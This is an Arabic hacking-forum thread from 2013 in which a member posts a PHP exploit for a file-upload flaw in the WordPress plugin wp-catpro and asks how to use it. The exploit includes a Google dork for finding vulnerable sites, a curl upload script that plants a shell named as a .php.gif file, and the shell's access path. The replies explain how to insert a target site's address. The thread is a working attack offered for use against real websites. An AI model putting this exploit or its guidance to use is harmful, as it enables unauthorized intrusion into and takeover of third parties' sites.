العودة   :: Security امان العرب Arab :: > The real World Of Hacking & Security > [ اختراق المواقـع والسيرفرات ] > [ مشاكل وحلول اختراق المواقع ]

[ مشاكل وحلول اختراق المواقع ] عندك مشكله مو عارف لها حل اسدحها وان شاء الله الاعضاء واحنا مو مقصرين

إضافة رد
 
أدوات الموضوع انواع عرض الموضوع
قديم 02-04-2013, 12:09 PM   المشاركة رقم: 1
الكاتب
nasser17
.:: عضو مشارك ::.
المعلومات  
التسجيل: Apr 2012
العضوية: 134307
المشاركات: 155
بمعدل : 0.07 يوميا
التوقيت
الإتصال nasser17 غير متواجد حالياً


المنتدى  
Question مساعدة في استغلال ثغرة upload

السلام عليكم ورحمة الله تعالى وبركاته اخواني اريد منكم مساعدة في استغلال هده الثغرة :

كود PHP:
#####
# Author => Zikou-16
# E-mail => zikou16x@gmail.com
# Facebook => http://fb.me/Zikou.se
# Google Dork => inurl:"/wp-content/plugins/wp-catpro/"
# Tested on : Windows 7 , Backtrack 5r3
# Download plugin : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####
 
#=> Exploit Info :
------------------
# The attacker can uplaod file/shell.php.gif
# ("jpg", "gif", "png")  // Allowed file extensions
# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file **** (in a Regular Expression format)
------------------
 
 
#=> Exploit
-----------
<?php
 
$uploadfile
="zik.php.gif";
$ch curl_init("http://[target]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
curl_setopt($chCURLOPT_POSTtrue);
curl_setopt($chCURLOPT_POSTFIELDS,
array(
'Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/uploads/catpro/'));
curl_setopt($chCURLOPT_RETURNTRANSFER1);
$postResult curl_exec($ch);
curl_close($ch);
 
print 
"$postResult";
?>
 
Shell Access : http://[target]/[path]/wp-content/uploads/catpro/random_****.php.gif
 
<?php
phpinfo
();
?>
يعني انا على حسبت مافهمت يجب انشاء صفحة php ونضع بها كود الاستغلال ام مادا ؟ مع اني جربتها في سرفر محلي واضفت الاضافة المصابة لكن لم تنجح ارجوا شرح بارك الله فيكم












عرض البوم صور nasser17   رد مع اقتباس

قديم 02-04-2013, 01:15 PM   المشاركة رقم: 2
الكاتب
hazem442
.:: عضو نشيط ::.
 
الصورة الرمزية hazem442
المعلومات  
التسجيل: Aug 2012
العضوية: 147945
الدولة: EgYpT
المشاركات: 376
بمعدل : 0.19 يوميا
التوقيت
الإتصال hazem442 غير متواجد حالياً


كاتب الموضوع  المنتدى  
افتراضي

كود php ضع مكان [target]/[path] الموقع الهدف ومسار سكربت الورد بريس
ودا zik.php.gif الشل الى هيتم رفعة












توقيع : hazem442

~:.[ ♣ ] By [ ♣ ].:~
! 【™ Hacker ZQS 】 !
==========================================
.. { آجۈْآء هآدئة " فـ لا صۈْت " غير آصۈْأت عزفنا .. على آۈْتآر الڰيبۈْرد }

_ We Will Never Stop Hacking_
_ Its not a game_
_ It's Our Job _
عرض البوم صور hazem442   رد مع اقتباس

قديم 02-04-2013, 01:51 PM   المشاركة رقم: 3
الكاتب
شبح الرافدين
.:: عضو شرف ::.
 
الصورة الرمزية شبح الرافدين
المعلومات  
التسجيل: Oct 2010
العضوية: 72962
المشاركات: 2,020
بمعدل : 0.77 يوميا
التوقيت
الإتصال شبح الرافدين غير متواجد حالياً


كاتب الموضوع  المنتدى  
افتراضي

ليش ما نزلت رابط الثغره من سكيورتي
شوف يا غالي
plugins الاضافات
wp-catpro < ملف او الاضافه المصابه
لازم مركب الورد برييس داخل سيرفر الشخصي
silt.com/wp-content/plugins/wp-catpro/
$uploadfile="zik.php.gif";
اي اسم الشل يكون zik.php.gif
zik < حسب اسم الملف
بدل
[فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط. اضغط هنا للتسجيل][path]/
الزق المواقع المصاب
انتهت












توقيع : شبح الرافدين

سبحآن الله وبحمده..سبحآن الله آلعظيم..

ghost-7@hotmail.com

ZONE-H

[فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط. اضغط هنا للتسجيل]
[فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط. اضغط هنا للتسجيل]

عرض البوم صور شبح الرافدين   رد مع اقتباس

إضافة رد

مواقع النشر (المفضلة)

الكلمات الدلالية (Tags)
admin, code, php, script, sql


الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 
أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
ثغرة رفع شل : upload super beta v1.3 Remote Shell Upload Vulnerability sec syria [ videos & مكتبة الفديو ] 10 07-31-2013 11:14 PM
ثغرة Upload snek-xp [ الـثـغـرات ] 4 09-19-2012 07:30 PM
ثغرة Upload BIn LaDen [ الـثـغـرات ] 15 09-18-2012 08:02 PM
استغلال ثغرة clickjacking وكيفية التعامل معها بسهوله من خلال ثغرة في الاكسبولر 7 Mr.No-1 [ اختراق المواقـع والسيرفرات ] 6 11-13-2011 11:11 AM
ممكن مساعدة في استغلال تغرة بايتون yassine17 [ مشاكل وحلول اختراق المواقع ] 3 04-28-2011 05:23 PM


الساعة الآن 10:47 PM.


Powered by vBulletin® Version 3.8.3
Copyright ©2000 - 2017, Jelsoft Enterprises Ltd.